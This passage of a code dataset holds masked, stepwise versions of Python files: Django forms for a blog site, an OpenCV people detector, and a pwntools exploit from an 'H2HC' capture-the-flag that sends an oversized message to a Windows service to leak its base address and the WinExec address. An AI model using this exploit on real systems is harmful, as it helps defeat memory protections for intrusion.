self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n", "step-4": "<mask token>\n\n\nclass SignupForm(UserCreationForm):\n <mask token>\n\n\n class Meta:\n model = User\n fields = 'username', 'email', 'password1', 'password2'\n <mask token>\n\n\nclass UserRegistrationForm(forms.Form):\n username = forms.CharField(required=True, min_length=6, label=\n 'Username', max_length=100, widget=forms.TextInput(attrs={\n 'placeholder': 'Username'}))\n email = forms.EmailField(required=True, label='Email', max_length=100,\n widget=forms.EmailInput(attrs={'placeholder':\n 'e.g. : email@gmail.com'}))\n firstname = forms.CharField(required=True, label='First Name',\n max_length=100, widget=forms.TextInput(attrs={'placeholder':\n 'First Name'}))\n lastname = forms.CharField(required=True, label='Last Name', max_length\n =100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))\n password = forms.CharField(required=True, label='Password', max_length=\n 100, widget=forms.PasswordInput(attrs={'placeholder': 'Password'}))\n passwordagain = forms.CharField(required=True, label='Password (Again)',\n max_length=100, widget=forms.PasswordInput(attrs={'placeholder':\n 'Password (Again)'}))\n\n\nclass TblPublishForm(forms.ModelForm):\n\n\n class Meta:\n model = TblPublish\n fields = '__all__'\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetData\n fields = ['snippet_topics', 'snippet_data_subject',\n 'snippet_data_description', 'snippet_data_keyword',\n 'snippet_data_code', 'snippet_data_datetime',\n 'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'\n ] = 'Title/Topics'\n self.fields['snippet_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['snippet_data_code'].widget.attrs['placeholder'\n ] = 'Snippet (Code)'\n self.fields['snippet_data_publish'].widget.attrs['placeholder'\n ] = 'Ready-To-Publish'\n self.fields['snippet_data_publish'].label = 'Publish'\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n", "step-5": "from django import forms\nfrom django.contrib.auth.models import User\nfrom .models import TblPublish , TblSnippetTopics, TblSnippetData, TblLearnTopics, TblLearnData, TblBlog, TblBlogComments,TblLearnDataComments, TblBlogGvp, TblLearnDataGvp,TblSnippetDataGvp, TblHome, TblAbout, TblQueries\nfrom django.contrib.auth.forms import UserCreationForm\n\nclass UsersigninForm(forms.Form):\n username = forms.CharField(required = True, label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}))\n password = forms.CharField(required = True, label = 'Password', max_length = 32, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))\n\nclass SignupForm(UserCreationForm):\n email = forms.EmailField(max_length=200, help_text='Required')\n class Meta:\n model = User\n fields = ('username', 'email', 'password1', 'password2')\n\n def __init__(self, *args, **kwargs):\n super(SignupForm, self).__init__(*args, **kwargs)\n self.fields['username'].widget.attrs['placeholder'] = \"Username\"\n self.fields['email'].widget.attrs['placeholder'] = \"email\"\n self.fields['password1'].widget.attrs['placeholder'] =\"password\"\n self.fields['password2'].widget.attrs['placeholder'] = \"password Again\"\n\nclass UserRegistrationForm(forms.Form):\n username = forms.CharField(required = True, min_length=6,label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}) )\n email = forms.EmailField(required = True, label = 'Email', max_length = 100, widget=forms.EmailInput(attrs={'placeholder': 'e.g. : email@gmail.com'}))\n firstname = forms.CharField(required = True, label = 'First Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'First Name'}))\n lastname = forms.CharField(required = True, label = 'Last Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))\n password = forms.CharField(required = True, label = 'Password', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))\n passwordagain = forms.CharField(required = True, label = 'Password (Again)', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password (Again)'}))\n\nclass TblPublishForm(forms.ModelForm):\n class Meta():\n model = TblPublish\n fields = '__all__'\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n class Meta():\n model = TblSnippetData\n fields = ['snippet_topics','snippet_data_subject','snippet_data_description','snippet_data_keyword','snippet_data_code','snippet_data_datetime','snippet_data_added_by','snippet_topics','snippet_data_publish']\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['snippet_data_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'] =\"Keyword For Search\"\n self.fields['snippet_data_code'].widget.attrs['placeholder'] = \"Snippet (Code)\"\n self.fields['snippet_data_publish'].widget.attrs['placeholder'] = \"Ready-To-Publish\"\n self.fields['snippet_data_publish'].label = \"Publish\"\n\nclass TblBlogForm(forms.ModelForm):\n class Meta():\n model = TblBlog\n fields = ['blog_title','blog_description','blog_keyword','blog_content','blog_pics','blog_publish','blog_datetime','blog_summary','blog_like','blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['blog_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['blog_content'].widget.attrs['placeholder'] = \"Blog Content\"\n self.fields['blog_keyword'].widget.attrs['placeholder'] = \"Keyword For Search\"\n self.fields['blog_pics'].widget.attrs['placeholder'] = \"Upload Pics\"\n self.fields['blog_publish'].label = \"Publish\"\n\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n class Meta():\n model = TblBlogComments\n fields = '__all__'\n\nclass TblLearnDataForm(forms.ModelForm):\n class Meta():\n model = TblLearnData\n fields = ['learn_data','learn_data_keyword','learn_data_description','learn_data_publish','learn_data_datetime','learn_data_added_by','learn_topics','learn_data_like','learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = \"Title/Topics\"\n self.fields['learn_data_description'].widget.attrs['placeholder'] = \"Brief Description\"\n self.fields['learn_data_keyword'].widget.attrs['placeholder'] = \"Keyword For Search\"\n self.fields['learn_data_publish'].label = \"Publish\"\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n class Meta():\n model = TblLearnDataComments\n fields = '__all__'\n\nclass TblBlogGvpForm(forms.ModelForm):\n class Meta():\n model = TblBlogGvp\n fields = '__all__'\nclass TblLearnDataGvpForm(forms.ModelForm):\n class Meta():\n model = TblLearnDataGvp\n fields = '__all__'\nclass TblHomeForm(forms.ModelForm):\n class Meta():\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = \"Upload Image\"\n self.fields['home_content'].widget.attrs['placeholder'] = \"Content\"\n self.fields['home_content_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['home_publish'].label = \"Publish\"\n\n\nclass TblAboutForm(forms.ModelForm):\n class Meta():\n model = TblAbout\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = \"Upload Image\"\n self.fields['about_content'].widget.attrs['placeholder'] = \"Content\"\n self.fields['about_content_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['about_publish'].label = \"Publish\"\n\nclass TblLearnTopicsForm(forms.ModelForm):\n class Meta():\n model = TblLearnTopics\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n # self.fields['learn_topics_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = \"Topics\"\n self.fields['learn_topics_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['learn_topics_publish'].label = \"Publish\"\n\n\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n class Meta():\n model = TblSnippetTopics\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = \"Topics\"\n self.fields['snippet_topics_description'].widget.attrs['placeholder'] = \"Description\"\n self.fields['snippet_topics_publish'].label = \"Publish\"\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\nclass TblQueriesForm(forms.ModelForm):\n class Meta():\n model = TblQueries\n fields = '__all__'\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = \"Name\"\n self.fields['email'].widget.attrs['placeholder'] = \"Email\"\n self.fields['subject'].widget.attrs['placeholder'] = \"Subject\"\n self.fields['message'].widget.attrs['placeholder'] = \"Message\"\n", "step-ids": [ 19, 20, 22, 26, 32 ] }
[ 19, 20, 22, 26, 32 ]
#!/usr/bin/python # -*- coding: utf-8 -*- ''' Aplicação H2HC criado para CTF Exploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com) ''' from pwn import * import os context(arch='amd64', os='windows', log_level='debug') host= "192.168.255.201" port = 54345 # Estágio 1 log.info("Enviando estágio 1") payload1 = "H2HC" #cookie payload1 += "\xff\x00\x00\x00" #size to trigger the vul payload1 += "\x41" * 0xff payload1 += "\n" p = remote(host, port) p.send(payload1) p.recv(4096) p.close() # Estágio 2 log.info("Enviando estágio 2") payload2 = "H2HC" payload2 += "\xff\x00\x00\x00" payload2 += "A" * 0x100 payload2 += "\x04\x09\x00\x00" p1 = remote(host, port) p1.send(payload2) p1.recvuntil("H2HC19 message:") #Leak de um endereço no próprio fluxo de execução da aplicação (Sessão .text) p1.recv(0x10d) ld1 = p1.recv(8) leak_local_addr = u64(ld1.ljust(8, "\x00")) base_addr = leak_local_addr & 0xffffffffffff0000 log.info("Local leak : %s" % hex(leak_local_addr)) log.info("App Base Addr : %s" % hex(base_addr)) # Leak do endereço da função WinExec p1.recv(0x7f0) #offset entre a posição zero até o 90 f0 7e 0a fa 7f lead_data = p1.recv(8) p1.recv(4096) leak = u64(lead_data.ljust(8, "\x00")) log.info("WinExec addr leak : %s" % hex(leak))
normal
{ "blob_id": "4fff64a62776a9d1b06cc11d5e55fc00f6787338", "index": 8128, "step-1": "<mask token>\n", "step-2": "<mask token>\ncontext(arch='amd64', os='windows', log_level='debug')\n<mask token>\nlog.info('Enviando estágio 1')\n<mask token>\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\n<mask token>\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\n<mask token>\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\n<mask token>\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\n<mask token>\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\n<mask token>\np1.recv(4096)\n<mask token>\nlog.info('WinExec addr leak : %s' % hex(leak))\n", "step-3": "<mask token>\ncontext(arch='amd64', os='windows', log_level='debug')\nhost = '192.168.255.201'\nport = 54345\nlog.info('Enviando estágio 1')\npayload1 = 'H2HC'\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\npayload2 = 'H2HC'\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\np1 = remote(host, port)\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, '\\x00'))\nbase_addr = leak_local_addr & 18446744073709486080\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\nlead_data = p1.recv(8)\np1.recv(4096)\nleak = u64(lead_data.ljust(8, '\\x00'))\nlog.info('WinExec addr leak : %s' % hex(leak))\n", "step-4": "<mask token>\nfrom pwn import *\nimport os\ncontext(arch='amd64', os='windows', log_level='debug')\nhost = '192.168.255.201'\nport = 54345\nlog.info('Enviando estágio 1')\npayload1 = 'H2HC'\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\npayload2 = 'H2HC'\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\np1 = remote(host, port)\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, '\\x00'))\nbase_addr = leak_local_addr & 18446744073709486080\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\nlead_data = p1.recv(8)\np1.recv(4096)\nleak = u64(lead_data.ljust(8, '\\x00'))\nlog.info('WinExec addr leak : %s' % hex(leak))\n", "step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nAplicação H2HC criado para CTF\nExploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com)\n'''\n\nfrom pwn import *\nimport os\n \ncontext(arch='amd64', os='windows', log_level='debug')\n\nhost= \"192.168.255.201\"\nport = 54345\n\n# Estágio 1\nlog.info(\"Enviando estágio 1\")\npayload1 = \"H2HC\" #cookie \npayload1 += \"\\xff\\x00\\x00\\x00\" #size to trigger the vul\npayload1 += \"\\x41\" * 0xff\npayload1 += \"\\n\"\n\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\n\n# Estágio 2\nlog.info(\"Enviando estágio 2\")\npayload2 = \"H2HC\" \npayload2 += \"\\xff\\x00\\x00\\x00\" \npayload2 += \"A\" * 0x100\npayload2 += \"\\x04\\x09\\x00\\x00\" \n\n\np1 = remote(host, port)\np1.send(payload2)\n\np1.recvuntil(\"H2HC19 message:\")\n\n\n#Leak de um endereço no próprio fluxo de execução da aplicação (Sessão .text)\np1.recv(0x10d) \nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, \"\\x00\"))\n\nbase_addr = leak_local_addr & 0xffffffffffff0000\n\nlog.info(\"Local leak : %s\" % hex(leak_local_addr))\nlog.info(\"App Base Addr : %s\" % hex(base_addr))\n\n# Leak do endereço da função WinExec\np1.recv(0x7f0) #offset entre a posição zero até o 90 f0 7e 0a fa 7f \nlead_data = p1.recv(8)\np1.recv(4096)\n\nleak = u64(lead_data.ljust(8, \"\\x00\"))\n\nlog.info(\"WinExec addr leak : %s\" % hex(leak))\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#from skimage import measure #from svmutil import * import cv2 import numpy as np def inside(r, q): rx, ry, rw, rh = r qx, qy, qw, qh = q return rx > qx and ry > qy and rx + rw < qx + qw and ry + rh < qy + qh def draw_detections(img, rects, thickness = 1): for x, y, w, h in rects: # the HOG detector returns slightly larger rectangles than the real objects. # so we slightly shrink the rectangles to get a nicer output. pad_w, pad_h = int(0.15*w), int(0.05*h) cv2.rectangle(img, (x+pad_w, y+pad_h), (x+w-pad_w, y+h-pad_h), (0, 255, 0), thickness) if __name__ == '__main__': hog = cv2.HOGDescriptor() hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector()) hogParams = {'winStride': (8, 8), 'padding': (32, 32), 'scale': 1.05} cap = cv2.VideoCapture(0) while(True): ret, frame = cap.read() if not ret: break found, w = hog.detectMultiScale(frame, **hogParams) found_filtered = [] for ri, r in enumerate(found): for qi, q in enumerate(found): if ri != qi and inside(r, q): break else: found_filtered.append(r) #draw_detections(frame, found) draw_detections(frame, found_filtered, 3) print('%d (%d) found' % (len(found_filtered), len(found))) key = cv2.waitKey(10) if key == 27: cv2.destroyAllWindows() break cv2.imshow('img', frame) # if cv2.waitKey(1) & 0xFF == ord('q'): # break cap.release() cv2.destroyAllWindows()
normal
{ "blob_id": "f012f862ad064fc168bd5328b97c433164a3a36f", "index": 3742, "step-1": "<mask token>\n\n\ndef draw_detections(img, rects, thickness=1):\n for x, y, w, h in rects:\n pad_w, pad_h = int(0.15 * w), int(0.05 * h)\n cv2.rectangle(img, (x + pad_w, y + pad_h), (x + w - pad_w, y + h -\n pad_h), (0, 255, 0), thickness)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef inside(r, q):\n rx, ry, rw, rh = r\n qx, qy, qw, qh = q\n return rx > qx and ry > qy and rx + rw < qx + qw and ry + rh < qy + qh\n\n\ndef draw_detections(img, rects, thickness=1):\n for x, y, w, h in rects:\n pad_w, pad_h = int(0.15 * w), int(0.05 * h)\n cv2.rectangle(img, (x + pad_w, y + pad_h), (x + w - pad_w, y + h -\n pad_h), (0, 255, 0), thickness)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef inside(r, q):\n rx, ry, rw, rh = r\n qx, qy, qw, qh = q\n return rx > qx and ry > qy and rx + rw < qx + qw and ry + rh < qy + qh\n\n\ndef draw_detections(img, rects, thickness=1):\n for x, y, w, h in rects:\n pad_w, pad_h = int(0.15 * w), int(0.05 * h)\n cv2.rectangle(img, (x + pad_w, y + pad_h), (x + w - pad_w, y + h -\n pad_h), (0, 255, 0), thickness)\n\n\nif __name__ == '__main__':\n hog = cv2.HOGDescriptor()\n hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n hogParams = {'winStride': (8, 8), 'padding': (32, 32), 'scale': 1.05}\n cap = cv2.VideoCapture(0)\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n found, w = hog.detectMultiScale(frame, **hogParams)\n found_filtered = []\n for ri, r in enumerate(found):\n for qi, q in enumerate(found):\n if ri != qi and inside(r, q):\n break\n else:\n found_filtered.append(r)\n draw_detections(frame, found_filtered, 3)\n print('%d (%d) found' % (len(found_filtered), len(found)))\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows()\n break\n cv2.imshow('img', frame)\n cap.release()\n cv2.destroyAllWindows()\n", "step-4": "import cv2\nimport numpy as np\n\n\ndef inside(r, q):\n rx, ry, rw, rh = r\n qx, qy, qw, qh = q\n return rx > qx and ry > qy and rx + rw < qx + qw and ry + rh < qy + qh\n\n\ndef draw_detections(img, rects, thickness=1):\n for x, y, w, h in rects:\n pad_w, pad_h = int(0.15 * w), int(0.05 * h)\n cv2.rectangle(img, (x + pad_w, y + pad_h), (x + w - pad_w, y + h -\n pad_h), (0, 255, 0), thickness)\n\n\nif __name__ == '__main__':\n hog = cv2.HOGDescriptor()\n hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n hogParams = {'winStride': (8, 8), 'padding': (32, 32), 'scale': 1.05}\n cap = cv2.VideoCapture(0)\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n found, w = hog.detectMultiScale(frame, **hogParams)\n found_filtered = []\n for ri, r in enumerate(found):\n for qi, q in enumerate(found):\n if ri != qi and inside(r, q):\n break\n else:\n found_filtered.append(r)\n draw_detections(frame, found_filtered, 3)\n print('%d (%d) found' % (len(found_filtered), len(found)))\n key = cv2.waitKey(10)\n if key == 27:\n cv2.destroyAllWindows()\n break\n cv2.imshow('img', frame)\n cap.release()\n cv2.destroyAllWindows()\n", "step-5": "#from skimage import measure\n#from svmutil import *\nimport cv2\nimport numpy as np \n\ndef inside(r, q):\n\trx, ry, rw, rh = r\n\tqx, qy, qw, qh = q\n\treturn rx > qx and ry > qy and rx + rw < qx + qw and ry + rh < qy + qh\n\ndef draw_detections(img, rects, thickness = 1):\n\tfor x, y, w, h in rects:\n # the HOG detector returns slightly larger rectangles than the real objects.\n # so we slightly shrink the rectangles to get a nicer output.\n\t\tpad_w, pad_h = int(0.15*w), int(0.05*h)\n\t\tcv2.rectangle(img, (x+pad_w, y+pad_h), (x+w-pad_w, y+h-pad_h), (0, 255, 0), thickness)\n\nif __name__ == '__main__': \n\thog = cv2.HOGDescriptor()\n\thog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())\n\thogParams = {'winStride': (8, 8), 'padding': (32, 32), 'scale': 1.05}\n\n\tcap = cv2.VideoCapture(0)\n\n\twhile(True):\n\n\t\tret, frame = cap.read()\n\t\tif not ret:\n\t\t\tbreak\n\n\t\tfound, w = hog.detectMultiScale(frame, **hogParams)\n\t\tfound_filtered = []\n\t\tfor ri, r in enumerate(found):\n\t\t\tfor qi, q in enumerate(found):\n\t\t\t\tif ri != qi and inside(r, q):\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tfound_filtered.append(r)\n\n\t\t#draw_detections(frame, found)\n\t\tdraw_detections(frame, found_filtered, 3)\n\t\tprint('%d (%d) found' % (len(found_filtered), len(found)))\n\t\tkey = cv2.waitKey(10)\n\t\tif key == 27:\n\t\t\tcv2.destroyAllWindows()\n\t\t\tbreak\n\n\t\tcv2.imshow('img', frame)\n#\t\tif cv2.waitKey(1) & 0xFF == 